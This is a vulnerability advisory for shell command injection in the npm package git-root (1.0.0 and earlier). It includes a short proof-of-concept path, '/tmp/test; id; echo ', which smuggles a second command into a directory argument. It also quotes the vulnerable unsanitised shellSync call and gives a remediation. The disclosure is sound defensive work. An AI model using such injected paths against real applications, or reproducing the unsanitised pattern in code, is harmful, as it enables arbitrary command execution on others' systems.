Shell Command Injection via directory path

[gnsehfvlr]

Shell Command Injection in git-root

Summary

git-root (<= 1.0.0) is vulnerable to Shell Command Injection via directory path input.

• CWE: CWE-78 - Improper Neutralization of Special Elements used in an OS Command
• Severity: Critical (CVSS 9.8)
• Weekly Downloads: 531
• npm: https://www.npmjs.com/package/git-root

Description

The git-root package uses execa.shellSync() to check if a directory is a git repository. The directory path is directly interpolated into a shell command string without sanitization, allowing shell metacharacter injection.

Proof of Concept

const gitRoot = require('git-root');

// Crafted path with shell metacharacters
const malicious = "/tmp/test; id; echo ";

// This executes: sh -c "cd /tmp/test; id; echo  ; git rev-parse --git-dir"
// The 'id' command is executed as a separate shell command
try {
  gitRoot.sync(malicious);
} catch(e) {}

The vulnerability is in the dependency is-git-repository which calls:

execa.shellSync("cd " + path + " ; git rev-parse --git-dir");
// path is NOT sanitized - shell metacharacters are interpreted

Impact

• Remote Code Execution (RCE): Any application that passes user-controlled directory paths to git-root is vulnerable to arbitrary command execution.
• Common in CLI tools, CI/CD pipelines, and monorepo management tools.

Remediation

Use execa.sync() instead of execa.shellSync() to avoid shell interpretation:

execa.sync('git', ['rev-parse', '--git-dir'], { cwd: path });

References

• CWE-78: OS Command Injection
• https://www.npmjs.com/package/git-root